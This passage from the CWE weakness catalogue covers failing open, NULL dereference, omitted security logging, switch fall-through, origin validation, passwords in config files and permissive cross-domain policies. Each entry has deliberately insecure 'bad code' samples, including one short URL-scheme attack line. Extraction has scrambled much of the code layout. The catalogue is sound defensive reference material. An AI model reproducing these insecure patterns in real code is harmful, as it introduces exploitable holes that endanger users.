adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Seven Pernicious Kingdoms" (View-700)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code loads and parses an XML file. (bad code)
Example Language: Java
// Read DOM try { ... } catch(Exception ex) {DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setValidating( false ); .... c_dom = factory.newDocumentBuilder().parse( xmlFile ); ... }The XML file is loaded without validating it against a known XML Schema or DTD. Example 2 The following code creates a DocumentBuilder object to be used in building an XML document. (bad code)
Example Language: Java
DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
builderFactory.setNamespaceAware(true); DocumentBuilder builder = builderFactory.newDocumentBuilder(); The DocumentBuilder object does not validate an XML document against a schema, making it possible to create an invalid XML document.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-636: Not Failing Securely ('Failing Open')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterWhen the product encounters an error condition or failure, its design requires it to fall back to a state that is less secure than other options that are available, such as selecting the weakest encryption algorithm or using the most permissive access control restrictions.
By entering a less secure state, the product inherits the weaknesses associated with that state, making it easier to compromise. At the least, it causes administrators to have a false sense of security. This weakness typically occurs as a result of wanting to "fail functional" to minimize administration and support costs, instead of "failing safe."
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Switches may revert their functionality to that of hubs when the table used to map ARP information to the switch interface overflows, such as when under a spoofing attack. This results in traffic being broadcast to an eavesdropper, instead of being sent only on the relevant switch interface. To mitigate this type of problem, the developer could limit the number of ARP entries that can be recorded for a given switch interface, while other interfaces may keep functioning normally. Configuration options can be provided on the appropriate actions to be taken in case of a detected failure, but safe defaults should be used. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Research Gap
Since design issues are hard to fix, they are rarely publicly reported, so there are few CVE examples of this problem as of January 2008. Most publicly reported issues occur as the result of an implementation error instead of design, such as CVE-2005-3177 (Improper handling of large numbers of resources) or CVE-2005-2969 (inadvertently disabling a verification step, leading to selection of a weaker protocol).
CWE-476: NULL Pointer Dereference
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. (bad code)
Example Language: C
void host_lookup(char *user_supplied_addr){
struct hostent *hp;
in_addr_t *addr; char hostname[64]; in_addr_t inet_addr(const char *cp); /*routine that ensures user_supplied_addr is in the right format for conversion */ validate_addr_form(user_supplied_addr); addr = inet_addr(user_supplied_addr); hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET); strcpy(hostname, hp->h_name); If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy(). Note that this code is also vulnerable to a buffer overflow (CWE-119). Example 2 In the following code, the programmer assumes that the system always has a property named "cmd" defined. If an attacker can control the program's environment so that "cmd" is not defined, the program throws a NULL pointer exception when it attempts to call the trim() method. (bad code)
Example Language: Java
String cmd = System.getProperty("cmd");
cmd = cmd.trim(); Example 3 This Android application has registered to handle a URL when sent an intent: (bad code)
Example Language: Java
... IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL"); MyReceiver receiver = new MyReceiver(); registerReceiver(receiver, filter); ... public class UrlHandlerReceiver extends BroadcastReceiver { @Override
public void onReceive(Context context, Intent intent) { if("com.example.URLHandler.openURL".equals(intent.getAction())) {
String URL = intent.getStringExtra("URLToOpen");
int length = URL.length(); ... } The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. Example 4 Consider the following example of a typical client server exchange. The HandleRequest function is intended to perform a request and use a defer to close the connection whenever the function returns. (bad code)
Example Language: Go
func HandleRequest(client http.Client, request *http.Request) (*http.Response, error) {
response, err := client.Do(request)
}defer response.Body.Close() if err != nil {
return nil, err
}... If a user supplies a malformed request or violates the client policy, the Do method can return a nil response and a non-nil err. This HandleRequest Function evaluates the close before checking the error. A deferred call's arguments are evaluated immediately, so the defer statement panics due to a nil response. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-223: Omission of Security-relevant Information
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not record or display information that would be important for identifying the source or nature of an attack, or determining if an action is safe.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code logs suspicious multiple login attempts. (bad code)
Example Language: PHP
function login($userName,$password){
if(authenticate($userName,$password)){
return True; }else{ incrementLoginAttempts($userName); }if(recentLoginAttempts($userName) > 5){ writeLog("Failed login attempt by User: " . $userName . " at " + date('r') ); }This code only logs failed login attempts when a certain limit is reached. If an attacker knows this limit, they can stop their attack from being discovered by avoiding the limit. Example 2 This code prints the contents of a file if a user has permission. (bad code)
Example Language: PHP
function readFile($filename){
$user = getCurrentUser();
$realFile = $filename; //resolve file if its a symbolic link if(is_link($filename)){ $realFile = readlink($filename); }if(fileowner($realFile) == $user){ echo file_get_contents($realFile); }return; else{ echo 'Access denied'; }writeLog($user . ' attempted to access the file '. $filename . ' on '. date('r')); While the code logs a bad access attempt, it logs the user supplied name for the file, not the canonicalized file name. An attacker can obscure their target by giving the script the name of a link to the file they are attempting to access. Also note this code contains a race condition between the is_link() and readlink() functions (CWE-363). Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-484: Omitted Break Statement in Switch
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product omits a break statement within a switch or similar construct, causing code associated with multiple conditions to execute. This can cause problems when the programmer only intended to execute code associated with one condition.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In both of these examples, a message is printed based on the month passed into the function: (bad code)
Example Language: Java
public void printMessage(int month){
switch (month) {
case 1: print("January"); case 2: print("February"); case 3: print("March"); case 4: print("April"); case 5: print("May"); case 6: print("June"); case 7: print("July"); case 8: print("August"); case 9: print("September"); case 10: print("October"); case 11: print("November"); case 12: print("December"); println(" is a great month"); (bad code)
Example Language: C
void printMessage(int month){
switch (month) {
case 1: printf("January"); case 2: printf("February"); case 3: printf("March"); case 4: printf("April"); case 5: printff("May"); case 6: printf("June"); case 7: printf("July"); case 8: printf("August"); case 9: printf("September"); case 10: printf("October"); case 11: printf("November"); case 12: printf("December"); printf(" is a great month"); Both examples do not use a break statement after each case, which leads to unintended fall-through behavior. For example, calling "printMessage(10)" will result in the text "OctoberNovemberDecember is a great month" being printed.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-346: Origin Validation Error
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This Android application will remove a user account when it receives an intent to do so: (bad code)
Example Language: Java
IntentFilter filter = new IntentFilter("com.example.RemoveUser");
MyReceiver receiver = new MyReceiver(); registerReceiver(receiver, filter); public class DeleteReceiver extends BroadcastReceiver { @Override }public void onReceive(Context context, Intent intent) { int userID = intent.getIntExtra("userID"); }destroyUserData(userID); This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file. Example 2 These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application: (bad code)
Example Language: Java
// Android
@Override public boolean shouldOverrideUrlLoading(WebView view, String url){ if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){
if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){ }writeDataToView(view, UserData); }return false; else{ return true; }(bad code)
Example Language: Objective-C
// iOS
-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType { NSURL *URL = [exRequest URL];
if ([[URL scheme] isEqualToString:@"exampleScheme"]) { NSString *functionString = [URL resourceSpecifier];
if ([functionString hasPrefix:@"specialFunction"]) { // Make data available back in webview. UIWebView *webView = [self writeDataToView:[URL query]]; return NO; return YES; A call into native code can then be initiated by passing parameters within the URL: (attack code)
Example Language: JavaScript
window.location = examplescheme://method?parameter=value
Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Terminology
The "Origin Validation Error" term was originally used in a 1995 thesis [REF-324]. Although not formally defined, an issue is considered to be an origin validation error if either (1) "an object [accepts] input from an unauthorized subject," or (2) "the system [fails] to properly or completely authenticate a subject." A later section says that an origin validation error can occur when the system (1) "does not properly authenticate a user or process" or (2) "does not properly authenticate the shared data or libraries." The only example provided in the thesis (covered by OSVDB:57615) involves a setuid program running command-line arguments without dropping privileges. So, this definition (and its examples in the thesis) effectively cover other weaknesses such as CWE-287 (Improper Authentication), CWE-285 (Improper Authorization), and CWE-250 (Execution with Unnecessary Privileges). There appears to be little usage of this term today, except in the SecurityFocus vulnerability database, where the term is used for a variety of issues, including web-browser problems that allow violation of the Same Origin Policy and improper validation of the source of an incoming message.
Maintenance
This entry has some significant overlap with other CWE entries and may need some clarification. See terminology notes.
CWE CATEGORY: OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
Relationship
This is an unusual category. CWE does not cover the limitations of human processes and procedures that cannot be described in terms of a specific technical weakness as resident in the code, architecture, or configuration of the software. Since "known vulnerabilities" can arise from any kind of weakness, it is not possible to map this OWASP category to other CWE entries, since it would effectively require mapping this category to ALL weaknesses.
CWE CATEGORY: OWASP Top Ten 2025 Category A01:2025 - Broken Access Control
Weaknesses in this category are related to the A01 category "Broken Access Control" in the OWASP Top Ten 2025.
Maintenance
As of CWE 4.19, the relationships in this category were pulled directly from the CWE mappings cited in the 2025 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself.
CWE CATEGORY: OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration
Weaknesses in this category are related to the A02 category "Security Misconfiguration" in the OWASP Top Ten 2025.
Maintenance
As of CWE 4.19, the relationships in this category were pulled directly from the CWE mappings cited in the 2025 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself.
CWE CATEGORY: OWASP Top Ten 2025 Category A03:2025 - Software Supply Chain Failures
Weaknesses in this category are related to the A03 category "Software Supply Chain Failures" in the OWASP Top Ten 2025.
Maintenance
As of CWE 4.19, the relationships in this category were pulled directly from the CWE mappings cited in the 2025 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself.
CWE CATEGORY: OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures
Weaknesses in this category are related to the A04 category "Cryptographic Failures" in the OWASP Top Ten 2025.
Maintenance
As of CWE 4.19, the relationships in this category were pulled directly from the CWE mappings cited in the 2025 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself.
CWE CATEGORY: OWASP Top Ten 2025 Category A05:2025 - Injection
Weaknesses in this category are related to the A05 category "Injection" in the OWASP Top Ten 2025.
Maintenance
As of CWE 4.19, the relationships in this category were pulled directly from the CWE mappings cited in the 2025 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself.
CWE CATEGORY: OWASP Top Ten 2025 Category A06:2025 - Insecure Design
Weaknesses in this category are related to the A06 category "Insecure Design" in the OWASP Top Ten 2025.
Maintenance
As of CWE 4.19, the relationships in this category were pulled directly from the CWE mappings cited in the 2025 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself.
CWE CATEGORY: OWASP Top Ten 2025 Category A07:2025 - Authentication Failures
Weaknesses in this category are related to the A07 category "Authentication Failures" in the OWASP Top Ten 2025.
Maintenance
As of CWE 4.19, the relationships in this category were pulled directly from the CWE mappings cited in the 2025 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself.
CWE CATEGORY: OWASP Top Ten 2025 Category A08:2025 - Software or Data Integrity Failures
Weaknesses in this category are related to the A08 category "Software or Data Integrity Failures" in the OWASP Top Ten 2025.
Maintenance
As of CWE 4.19, the relationships in this category were pulled directly from the CWE mappings cited in the 2025 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself.
CWE CATEGORY: OWASP Top Ten 2025 Category A09:2025 - Logging & Alerting Failures
Weaknesses in this category are related to the A09 category "Logging & Alerting Failures" in the OWASP Top Ten 2025.
Maintenance
As of CWE 4.19, the relationships in this category were pulled directly from the CWE mappings cited in the 2025 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself.
CWE CATEGORY: OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions
Weaknesses in this category are related to the A10 category "Mishandling of Exceptional Conditions" in the OWASP Top Ten 2025.
Maintenance
As of CWE 4.19, the relationships in this category were pulled directly from the CWE mappings cited in the 2025 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself.
CWE-260: Password in Configuration File
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product stores a password in a configuration file that might be accessible to actors who do not know the password.
This can result in compromise of the system for which the password is used. An attacker could gain access to this file and learn the stored password or worse yet, change the password to one of their choosing.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Below is a snippet from a Java properties file. (bad code)
Example Language: Java
webapp.ldap.username = secretUsername
webapp.ldap.password = secretPassword Because the LDAP credentials are stored in plaintext, anyone with access to the file can gain access to the resource. Example 2 The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. This Java example shows a properties file with a cleartext username / password pair. (bad code)
Example Language: Java
# Java Web App ResourceBundle properties file ... webapp.ldap.username=secretUsername webapp.ldap.password=secretPassword ... The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. (bad code)
Example Language: ASP.NET
...
<connectionStrings> <add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /> </connectionStrings>... Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-942: Permissive Cross-domain Security Policy with Untrusted Domains
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a web-client protection
mechanism such as a Content Security Policy (CSP) or
cross-domain policy file, but the policy includes untrusted
domains with which the web client is allowed to
communicate.
If a cross-domain policy file includes domains that should not be trusted, such as when using wildcards under a high-level domain, then the application could be attacked by these untrusted domains. In many cases, the attack can be launched without the victim even being aware of it. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 These cross-domain policy files mean to allow Flash and Silverlight applications hosted on other domains to access its data: Flash crossdomain.xml : (bad code)
Example Language: XML
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd"> <allow-access-from domain="*.example.com"/> <allow-access-from domain="*"/> </cross-domain-policy> Silverlight clientaccesspolicy.xml : (bad code)
Example Language: XML
<?xml version="1.0" encoding="utf-8"?>
<access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="SOAPAction"> <domain uri="*"/> </allow-from> <grant-to> <resource path="/" include-subpaths="true"/> </grant-to> </policy> </cross-domain-access> </access-policy> These entries are far too permissive, allowing any Flash or Silverlight application to send requests. A malicious application hosted on any other web site will be able to send requests on behalf of any user tricked into executing it. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-183: Permissive List of Allowed Inputs
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
